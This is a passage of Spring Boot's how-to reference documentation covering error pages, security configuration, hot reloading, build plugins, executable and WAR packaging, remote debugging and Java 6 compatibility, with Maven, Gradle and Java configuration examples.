and\n_<<production-ready-features.adoc#production-ready-customizing-management-server-port>>_\nin the '`Production-ready features`' section.\n\n\n\n[[howto-customize-the-whitelabel-error-page]]\n=== Customize the '`whitelabel`' error page\nSpring Boot installs a '`whitelabel`' error page that you will see in browser client if\nyou encounter a server error (machine clients consuming JSON and other media types should\nsee a sensible response with the right error code).\n\nNOTE: Set `server.error.whitelabel.enabled=false` to switch the default error page off\nwhich will restore the default of the servlet container that you are using. Note that\nSpring Boot will still attempt to resolve the error view so you'd probably add you own\nerror page rather than disabling it completely.\n\nOverriding the error page with your own depends on the templating technology that you are\nusing. For example, if you are using Thymeleaf you would add an `error.html` template and\nif you are using FreeMarker you would add an `error.ftl` template. In general what you\nneed is a `View` that resolves with a name of `error`, and\/or a `@Controller` that handles\nthe `\/error` path. Unless you replaced some of the default configuration you should find\na `BeanNameViewResolver` in your `ApplicationContext` so a `@Bean` with id `error` would\nbe a simple way of doing that. Look at\n{sc-spring-boot-autoconfigure}\/web\/ErrorMvcAutoConfiguration.{sc-ext}[`ErrorMvcAutoConfiguration`] for more options.\n\nSee also the section on <<boot-features-error-handling, Error Handling>> for details of\nhow to register handlers in the servlet container.\n\n\n\n[[howto-use-actuator-with-jersey]]\n=== Actuator and Jersey\nActuator HTTP endpoints are only available for Spring MVC-based applications. If you want\nto use Jersey and still use the actuator you will need to enable Spring MVC (by depending\non `spring-boot-starter-web`, for example). By default, both Jersey and the Spring MVC\ndispatcher servlet are mapped to the same path (`\/`). You will need to change the path for\none of them (by configuring `server.servlet-path` for Spring MVC or\n`spring.jersey.application-path` for Jersey). For example, if you add\n`server.servlet-path=\/system` into `application.properties`, the actuator HTTP endpoints\nwill be available under `\/system`.\n\n\n\n[[howto-security]]\n== Security\n\n\n[[howto-switch-off-spring-boot-security-configuration]]\n=== Switch off the Spring Boot security configuration\nIf you define a `@Configuration` with `@EnableWebSecurity` anywhere in your application\nit will switch off the default webapp security settings in Spring Boot (but leave the\nActuator's security enabled). To tweak the defaults try setting properties in\n`+security.*+` (see\n{sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[`SecurityProperties`]\nfor details of available settings) and `SECURITY` section of\n<<common-application-properties-security,Common application properties>>.\n\n\n\n[[howto-change-the-authenticationmanager-and-add-user-accounts]]\n=== Change the AuthenticationManager and add user accounts\nIf you provide a `@Bean` of type `AuthenticationManager` the default one will not be\ncreated, so you have the full feature set of Spring Security available (e.g.\nhttp:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/reference\/htmlsingle\/#jc-authentication[various authentication options]).\n\nSpring Security also provides a convenient `AuthenticationManagerBuilder` which can be\nused to build an `AuthenticationManager` with common options. The recommended way to\nuse this in a webapp is to inject it into a void method in a\n`WebSecurityConfigurerAdapter`, e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\tpublic class SecurityConfiguration extends WebSecurityConfigurerAdapter {\n\n\t\t@Autowired\n\t\tpublic void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {\n\t\t\t\tauth.inMemoryAuthentication()\n\t\t\t\t\t.withUser(\"barry\").password(\"password\").roles(\"USER\"); \/\/ ... etc.\n\t\t}\n\n\t\t\/\/ ... other stuff for application security\n\n\t}\n----\n\nYou will get the best results if you put this in a nested class, or a standalone class\n(i.e. not mixed in with a lot of other `@Beans` that might be allowed to influence the\norder of instantiation). The {github-code}\/spring-boot-samples\/spring-boot-sample-web-secure[secure web sample]\nis a useful template to follow.\n\nIf you experience instantiation issues (e.g. using JDBC or JPA for the user detail store)\nit might be worth extracting the `AuthenticationManagerBuilder` callback into a\n`GlobalAuthenticationConfigurerAdapter` (in the `init()` method so it happens before the\nauthentication manager is needed elsewhere), e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\tpublic class AuthenticationManagerConfiguration extends\n\t\t\tGlobalAuthenticationConfigurerAdapter {\n\n\t\t@Override\n\t\tpublic void init(AuthenticationManagerBuilder auth) {\n\t\t\tauth.inMemoryAuthentication() \/\/ ... etc.\n\t\t}\n\n\t}\n----\n\n\n\n[[howto-enable-https]]\n=== Enable HTTPS when running behind a proxy server\nEnsuring that all your main endpoints are only available over HTTPS is an important\nchore for any application. If you are using Tomcat as a servlet container, then\nSpring Boot will add Tomcat's own `RemoteIpValve` automatically if it detects some\nenvironment settings, and you should be able to rely on the `HttpServletRequest` to\nreport whether it is secure or not (even downstream of a proxy server that handles the\nreal SSL termination). The standard behavior is determined by the presence or absence of\ncertain request headers (`x-forwarded-for` and `x-forwarded-proto`), whose names are\nconventional, so it should work with most front end proxies. You can switch on the valve\nby adding some entries to `application.properties`, e.g.\n\n[source,properties,indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.protocol-header=x-forwarded-proto\n----\n\n(The presence of either of those properties will switch on the valve. Or you can add the\n`RemoteIpValve` yourself by adding a `TomcatEmbeddedServletContainerFactory` bean.)\n\nSpring Security can also be configured to require a secure channel for all (or some\nrequests). To switch that on in a Spring Boot application you just need to set\n`security.require_ssl` to `true` in `application.properties`.\n\n\n\n[[howto-hotswapping]]\n== Hot swapping\n\n\n\n[[howto-reload-static-content]]\n=== Reload static content\nThere are several options for hot reloading. The recommended approach is to use\n<<using-spring-boot.adoc#using-boot-devtools,`spring-boot-devtools`>> as it provides\nadditional development-time features such as support for fast application restarts\nand LiveReload as well as sensible development-time configuration (e.g. template caching).\nDevtools works by monitoring the classpath for changes. This means that static resource\nchanges must be \"built\" for the change to take affect. By default, this happens\nautomatically in Eclipse when you save your changes. In IntelliJ IDEA, Make Project will\ntrigger the necessary build. Due to the\n<<using-spring-boot.adoc#using-boot-devtools-restart-exclude, default restart\nexclusions>>, changes to static resources will not trigger a restart of your application.\nThey will, however, trigger a live reload.\n\nAlternatively, running in an IDE (especially with debugging on) is a good way to do\ndevelopment (all modern IDEs allow reloading of static resources and usually also\nhot-swapping of Java class changes).\n\nFinally, the <<build-tool-plugins.adoc#build-tool-plugins, Maven and Gradle plugins>> can\nbe configured (see the `addResources` property) to support running from the command line\nwith reloading of static files directly from source. You can use that with an external\ncss\/js compiler process if you are writing that code with higher level tools.\n\n\n\n[[howto-reload-thymeleaf-template-content]]\n=== Reload templates without restarting the container\nMost of the templating technologies supported by Spring Boot include a configuration\noption to disable caching (see below for details). If you're using the\n`spring-boot-devtools` module these properties will be\n<<using-spring-boot.adoc#using-boot-devtools-property-defaults,automatically configured>>\nfor you at development time.\n\n\n\n[[howto-reload-thymeleaf-content]]\n==== Thymeleaf templates\nIf you are using Thymeleaf, then set `spring.thymeleaf.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]\nfor other Thymeleaf customization options.\n\n\n\n[[howto-reload-freemarker-content]]\n==== FreeMarker templates\nIf you are using FreeMarker, then set `spring.freemarker.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]\nfor other FreeMarker customization options.\n\n\n\n[[howto-reload-groovy-template-content]]\n==== Groovy templates\nIf you are using Groovy templates, then set `spring.groovy.template.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\nfor other Groovy customization options.\n\n\n\n[[howto-reload-fast-restart]]\n=== Fast application restarts\nThe `spring-boot-devtools` module includes support for automatic application restarts.\nWhilst not as fast as technologies such as http:\/\/zeroturnaround.com\/software\/jrebel\/[JRebel]\nor https:\/\/github.com\/spring-projects\/spring-loaded[Spring Loaded] it's usually\nsignificantly faster than a \"`cold start`\". You should probably give it a try before\ninvestigating some of the more complex reload options discussed below.\n\nFor more details see the <<using-spring-boot.adoc#using-boot-devtools>> section.\n\n\n[[howto-reload-java-classes-without-restarting]]\n=== Reload Java classes without restarting the container\nModern IDEs (Eclipse, IDEA, etc.) all support hot swapping of bytecode, so if you make a\nchange that doesn't affect class or method signatures it should reload cleanly with no\nside effects.\n\nhttps:\/\/github.com\/spring-projects\/spring-loaded[Spring Loaded] goes a little further in\nthat it can reload class definitions with changes in the method signatures. With some\ncustomization it can force an `ApplicationContext` to refresh itself (but there is no\ngeneral mechanism to ensure that would be safe for a running application anyway, so it\nwould only ever be a development time trick probably).\n\n\n[[howto-reload-springloaded-maven]]\n==== Configuring Spring Loaded for use with Maven\nTo use Spring Loaded with the Maven command line, just add it as a dependency in the\nSpring Boot plugin declaration, e.g.\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t<dependencies>\n\t\t\t<dependency>\n\t\t\t\t<groupId>org.springframework<\/groupId>\n\t\t\t\t<artifactId>springloaded<\/artifactId>\n\t\t\t\t<version>1.2.6.RELEASE<\/version>\n\t\t\t<\/dependency>\n\t\t<\/dependencies>\n\t<\/plugin>\n----\n\nThis normally works pretty well with Eclipse and IntelliJ IDEA as long as they have their\nbuild configuration aligned with the Maven defaults (Eclipse m2e does this out of the\nbox).\n\n\n\n[[howto-reload-springloaded-gradle-and-intellij-idea]]\n==== Configuring Spring Loaded for use with Gradle and IntelliJ IDEA\nYou need to jump through a few hoops if you want to use Spring Loaded in combination with\nGradle and IntelliJ IDEA. By default, IntelliJ IDEA will compile classes into a different\nlocation than Gradle, causing Spring Loaded monitoring to fail.\n\nTo configure IntelliJ IDEA correctly you can use the `idea` Gradle plugin:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tbuildscript {\n\t\trepositories { jcenter() }\n\t\tdependencies {\n\t\t\tclasspath \"org.springframework.boot:spring-boot-gradle-plugin:{spring-boot-version}\"\n\t\t\tclasspath 'org.springframework:springloaded:1.2.6.RELEASE'\n\t\t}\n\t}\n\n\tapply plugin: 'idea'\n\n\tidea {\n\t\tmodule {\n\t\t\tinheritOutputDirs = false\n\t\t\toutputDir = file(\"$buildDir\/classes\/main\/\")\n\t\t}\n\t}\n\n\t\/\/ ...\n\n----\n\nNOTE: IntelliJ IDEA must be configured to use the same Java version as the command line\nGradle task and `springloaded` *must* be included as a `buildscript` dependency.\n\nYou can also additionally enable '`Make Project Automatically`' inside IntelliJ IDEA to\nautomatically compile your code whenever a file is saved.\n\n\n\n[[howto-build]]\n== Build\n\n\n\n[[howto-build-info]]\n=== Generate build information\nBoth the Maven and Gradle plugin allow to generate build information containing\nthe coordinates, name and version of the project. The plugin can also be configured\nto add additional properties through configuration. When such file is present,\nSpring Boot auto-configures a `BuildProperties` bean.\n\nTo generate build information with Maven, add an execution for the `build-info` goal:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>build-info<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nTIP: Check the {spring-boot-maven-plugin-site}\/[Spring Boot Maven Plugin documentation]\nfor more details.\n\nAnd to do the same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\tbuildInfo()\n\t}\n----\n\nAdditional properties can be added using the DSL:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\tbuildInfo {\n\t\t\tadditionalProperties = [\n\t\t\t\t'foo': 'bar'\n\t\t\t]\n\t\t}\n\t}\n----\n\n\n\n[[howto-git-info]]\n=== Generate git information\n\nBoth Maven and Gradle allow to generate a `git.properties` file containing information\nabout the state of your `git` source code repository when the project was built.\n\nFor Maven users the `spring-boot-starter-parent` POM includes a pre-configured plugin to\ngenerate a `git.properties` file. Simply add the following declaration to your POM:\n\n[source,xml,indent=0]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>pl.project13.maven<\/groupId>\n\t\t\t\t<artifactId>git-commit-id-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nGradle users can achieve the same result using the\nhttps:\/\/plugins.gradle.org\/plugin\/com.gorylenko.gradle-git-properties[`gradle-git-properties`] plugin\n\n[source,groovy,indent=0]\n----\n\tplugins {\n\t\tid \"com.gorylenko.gradle-git-properties\" version \"1.4.17\"\n\t}\n----\n\nTIP: The commit time in `git.properties` is expected to match the format\n`yyyy-MM-dd'T'HH:mm:ssZ`. This is the default format for both plugins listed above. Using this format\nallows the time to be parsed into a `Date` and its format when serialized to JSON to be controlled by\nJackson's date serialization configuration settings.\n\n\n\n[[howto-customize-dependency-versions-with-maven]]\n[[howto-customize-dependency-versions]]\n=== Customize dependency versions\nIf you use a Maven build that inherits directly or indirectly from `spring-boot-dependencies`\n(for instance `spring-boot-starter-parent`) but you want to override a specific\nthird-party dependency you can add appropriate `<properties>` elements. Browse\nthe {github-code}\/spring-boot-dependencies\/pom.xml[`spring-boot-dependencies`]\nPOM for a complete list of properties. For example, to pick a different `slf4j` version\nyou would add the following:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<slf4j.version>1.7.5<slf4j.version>\n\t<\/properties>\n----\n\nNOTE: This only works if your Maven project inherits (directly or indirectly) from\n`spring-boot-dependencies`. If you have added `spring-boot-dependencies` in your\nown `dependencyManagement` section with `<scope>import<\/scope>` you have to redefine\nthe artifact yourself instead of overriding the property.\n\nWARNING: Each Spring Boot release is designed and tested against a specific set of\nthird-party dependencies. Overriding versions may cause compatibility issues.\n\nTo override dependency versions in Gradle, you can specify a version as shown below:\n\n[source,groovy,indent=0]\n----\n\text['slf4j.version'] = '1.7.5'\n----\n\nFor additional information, please refer to the\nhttps:\/\/github.com\/spring-gradle-plugins\/dependency-management-plugin[Gradle Dependency\nManagement Plugin documentation].\n\n[[howto-create-an-executable-jar-with-maven]]\n=== Create an executable JAR with Maven\nThe `spring-boot-maven-plugin` can be used to create an executable '`fat`' JAR. If you\nare using the `spring-boot-starter-parent` POM you can simply declare the plugin and\nyour jars will be repackaged:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIf you are not using the parent POM you can still use the plugin, however, you must\nadditionally add an `<executions>` section:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>repackage<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nSee the {spring-boot-maven-plugin-site}\/usage.html[plugin documentation] for full usage\ndetails.\n\n\n[[howto-create-an-additional-executable-jar]]\n=== Use a Spring Boot application as a dependency\nLike a war file, a Spring Boot application is not intended to be used as a dependency. If\nyour application contains classes that you want to share with other projects, the\nrecommended approach is to move that code into a separate module. The separate module can\nthen be depended upon by your application and other projects.\n\nIf you cannot rearrange your code as recommended above, Spring Boot's Maven and Gradle\nplugins must be configured to produce a separate artifact that is suitable for use as a\ndependency. The executable archive cannot be used as a dependency as the\n<<appendix-executable-jar-format.adoc#executable-jar-jar-file-structure,executable jar\nformat>> packages application classes in `BOOT-INF\/classes`. This means\nthat they cannot be found when the executable jar is used as a dependency.\n\nTo produce the two artifacts, one that can be used as a dependency and one that is\nexecutable, a classifier must be specified. This classifier is applied to the name of the\nexecutable archive, leaving the default archive for use as dependency.\n\nTo configure a classifier of `exec` in Maven, the following configuration can be used:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nAnd when using Gradle, the following configuration can be used:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tbootRepackage {\n\t\tclassifier = 'exec'\n\t}\n----\n\n\n\n[[howto-extract-specific-libraries-when-an-executable-jar-runs]]\n=== Extract specific libraries when an executable jar runs\nMost nested libraries in an executable jar do not need to be unpacked in order to run,\nhowever, certain libraries can have problems. For example, JRuby includes its own nested\njar support which assumes that the `jruby-complete.jar` is always directly available as a\nfile in its own right.\n\nTo deal with any problematic libraries, you can flag that specific nested jars should be\nautomatically unpacked to the '`temp folder`' when the executable jar first runs.\n\nFor example, to indicate that JRuby should be flagged for unpack using the Maven Plugin\nyou would add the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<requiresUnpack>\n\t\t\t\t\t\t<dependency>\n\t\t\t\t\t\t\t<groupId>org.jruby<\/groupId>\n\t\t\t\t\t\t\t<artifactId>jruby-complete<\/artifactId>\n\t\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<\/requiresUnpack>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nAnd to do that same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\trequiresUnpack = ['org.jruby:jruby-complete']\n\t}\n----\n\n\n\n[[howto-create-a-nonexecutable-jar]]\n=== Create a non-executable JAR with exclusions\nOften if you have an executable and a non-executable jar as build products, the executable\nversion will have additional configuration files that are not needed in a library jar.\nE.g. the `application.yml` configuration file might excluded from the non-executable JAR.\n\nHere's how to do that in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-jar-plugin<\/artifactId>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<id>exec<\/id>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<!-- Need this to ensure application.yml is excluded -->\n\t\t\t\t\t\t\t<forceCreation>true<\/forceCreation>\n\t\t\t\t\t\t\t<excludes>\n\t\t\t\t\t\t\t\t<exclude>application.yml<\/exclude>\n\t\t\t\t\t\t\t<\/excludes>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIn Gradle you can create a new JAR archive with standard task DSL features, and then have\nthe `bootRepackage` task depend on that one using its `withJarTask` property:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tjar {\n\t\tbaseName = 'spring-boot-sample-profile'\n\t\tversion = '0.0.0'\n\t\texcludes = ['**\/application.yml']\n\t}\n\n\ttask('execJar', type:Jar, dependsOn: 'jar') {\n\t\tbaseName = 'spring-boot-sample-profile'\n\t\tversion = '0.0.0'\n\t\tclassifier = 'exec'\n\t\tfrom sourceSets.main.output\n\t}\n\n\tbootRepackage {\n\t\twithJarTask = tasks['execJar']\n\t}\n----\n\n\n\n[[howto-remote-debug-maven-run]]\n=== Remote debug a Spring Boot application started with Maven\nTo attach a remote debugger to a Spring Boot application started with Maven you can use\nthe `jvmArguments` property of the {spring-boot-maven-plugin-site}\/[maven plugin].\n\nCheck {spring-boot-maven-plugin-site}\/examples\/run-debug.html[this example] for more details.\n\n\n\n[[howto-remote-debug-gradle-run]]\n=== Remote debug a Spring Boot application started with Gradle\nTo attach a remote debugger to a Spring Boot application started with Gradle you can use\nthe `jvmArgs` property of `bootRun` task or `--debug-jvm` command line option.\n\n`build.gradle`:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tbootRun {\n\t\tjvmArgs \"-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=5005\"\n\t}\n----\n\n\nCommand line:\n\n[indent=0]\n----\n\t$ gradle bootRun --debug-jvm\n----\n\n\nCheck {gradle-userguide}\/application_plugin.html[Gradle Application Plugin] for more\ndetails.\n\n\n\n[[howto-build-an-executable-archive-with-ant]]\n=== Build an executable archive from Ant without using spring-boot-antlib\nTo build with Ant you need to grab dependencies, compile and then create a jar or war\narchive. To make it executable you can either use the `spring-boot-antlib`\nmodule, or you can follow these instructions:\n\n. If you are building a jar, package the application's classes and resources in a nested\n `BOOT-INF\/classes` directory. If you are building a war, package the application's\n classes in a nested `WEB-INF\/classes` directory as usual.\n. Add the runtime dependencies in a nested `BOOT-INF\/lib` directory for a jar or\n `WEB-INF\/lib` for a war. Remember *not* to compress the entries in the archive.\n. Add the `provided` (embedded container) dependencies in a nested `BOOT-INF\/lib`\n directory for jar or `WEB-INF\/lib-provided` for a war. Remember *not* to compress the\n entries in the archive.\n. Add the `spring-boot-loader` classes at the root of the archive (so the `Main-Class`\n is available).\n. Use the appropriate launcher, e.g. `JarLauncher` for a jar file, as a `Main-Class`\n attribute in the manifest and specify the other properties it needs as manifest entries,\n principally a `Start-Class`.\n\nExample:\n\n[source,xml,indent=0]\n----\n\t<target name=\"build\" depends=\"compile\">\n\t\t<jar destfile=\"target\/${ant.project.name}-${spring-boot.version}.jar\" compress=\"false\">\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"target\/classes\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"src\/main\/resources\" erroronmissingdir=\"false\"\/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"${lib.dir}\/runtime\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/lib\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<zipfileset src=\"${lib.dir}\/loader\/spring-boot-loader-jar-${spring-boot.version}.jar\" \/>\n\t\t\t<manifest>\n\t\t\t\t<attribute name=\"Main-Class\" value=\"org.springframework.boot.loader.JarLauncher\" \/>\n\t\t\t\t<attribute name=\"Start-Class\" value=\"${start-class}\" \/>\n\t\t\t<\/manifest>\n\t\t<\/jar>\n\t<\/target>\n----\n\nThe {github-code}\/spring-boot-samples\/spring-boot-sample-ant[Ant Sample] has a\n`build.xml` with a `manual` task that should work if you run it with\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ ant -lib <folder containing ivy-2.2.jar> clean manual\n----\n\nafter which you can run the application with\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar target\/*.jar\n----\n\n\n\n[[howto-use-java-6]]\n=== How to use Java 6\nIf you want to use Spring Boot with Java 6 there are a small number of configuration\nchanges that you will have to make. The exact changes depend on your application's\nfunctionality.\n\n\n\n[[howto-use-java-6-embedded-container]]\n==== Embedded servlet container compatibility\nIf you are using one of Boot's embedded Servlet containers you will have to use a\nJava 6-compatible container. Both Tomcat 7 and Jetty 8 are Java 6 compatible. See\n<<howto-use-tomcat-7>> and <<howto-use-jetty-8>> for details.\n\n\n\n[[howto-use-java-6-jackson]]\n==== Jackson\nJackson 2.7 and later requires Java 7. If you want to use Jackson with Java 6 you\nwill have to downgrade to Jackson 2.6.\n\nSpring Boot uses the Jackson BOM that was introduced as of Jackson 2.7 so you can't just\noverride the `jackson.version` property. In order to use Jackson 2.6, you will have to\ndefine the individual modules in the `dependencyManagement` section of your build, check\nhttps:\/\/github.com\/{github-repo}\/blob\/0ffc7dc13f6de82c199a6d503354a88c7aaec2d9\/spring-boot-dependencies\/pom.xml#L523-L597[this\nexample] for more details.\n\n\n\n[[how-to-use-java-6-jta-api]]\n==== JTA API compatibility\nWhile the Java Transaction API itself doesn't require Java 7 the official API jar\ncontains classes that have been built to require Java 7. If you are using JTA then\nyou will need to replace the official JTA 1.2 API jar with one that has been built\nto work on Java 6. To do so, exclude any transitive dependencies on\n`javax.transaction:javax.transaction-api` and replace them with a dependency on\n`org.jboss.spec.javax.transaction:jboss-transaction-api_1.2_spec:1.0.0.Final`\n\n\n\n[[howto-traditional-deployment]]\n== Traditional deployment\n\n\n\n[[howto-create-a-deployable-war-file]]\n=== Create a deployable war file\n\nThe first step in producing a deployable war file is to provide a\n`SpringBootServletInitializer` subclass and override its `configure` method. This makes\nuse of Spring Framework's Servlet 3.0 support and allows you to configure your\napplication when it's launched by the servlet container. Typically, you update your\napplication's main class to extend `SpringBootServletInitializer`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\treturn application.sources(Application.class);\n\t\t}\n\n\t\tpublic static void main(String[] args) throws Exception {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nThe next step is to update your build configuration so that your project produces a war file\nrather than a jar file. If you're using Maven and using `spring-boot-starter-parent` (which\nconfigures Maven's war plugin for you) all you need to do is to modify `pom.xml` to change the\npackaging to war:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<packaging>war<\/packaging>\n----\n\nIf you're using Gradle, you need to modify `build.gradle` to apply the war plugin to the\nproject:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tapply plugin: 'war'\n----\n\nThe final step in the process is to ensure that the embedded servlet container doesn't\ninterfere with the servlet container to which the war file will be deployed. To do so, you\nneed to mark the embedded servlet container dependency as provided.\n\nIf you're using Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<!-- \u2026 -->\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<scope>provided<\/scope>\n\t\t<\/dependency>\n\t\t<!-- \u2026 -->\n\t<\/dependencies>\n----\n\nAnd if you're using Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\t\/\/ \u2026\n\t\tprovidedRuntime 'org.springframework.boot:spring-boot-starter-tomcat'\n\t\t\/\/ \u2026\n\t}\n----\n\nNOTE: If you are using a version of Gradle that supports compile only dependencies (2.12\nor later), you should continue to use `providedRuntime`. Among other limitations,\n`compileOnly` dependencies are not on the test classpath so any web-based integration\ntests will fail.\n\nIf you're using the <<build-tool-plugins.adoc#build-tool-plugins, Spring Boot build tools>>,\nmarking the embedded servlet container dependency as provided will produce an executable war\nfile with the provided dependencies packaged in a `lib-provided` directory. This means\nthat, in addition to being deployable to a servlet container, you can also run your\napplication using `java -jar` on the command line.\n\nTIP: Take a look at Spring Boot's sample applications for a\n{github-code}\/spring-boot-samples\/spring-boot-sample-traditional\/pom.xml[Maven-based example]\nof the above-described configuration.\n\n\n\n[[howto-create-a-deployable-war-file-for-older-containers]]\n=== Create a deployable war file for older servlet containers\nOlder Servlet containers don't have support for the `ServletContextInitializer` bootstrap\nprocess used in Servlet 3.0. You can still use Spring and Spring Boot in these containers\nbut you are going to need to add a `web.xml` to your application and configure it to load\nan `ApplicationContext` via a `DispatcherServlet`.\n\n\n\n[[howto-convert-an-existing-application-to-spring-boot]]\n=== Convert an existing application to Spring Boot\nFor a non-web application it should be easy (throw away the code that creates your\n`ApplicationContext` and replace it with calls to 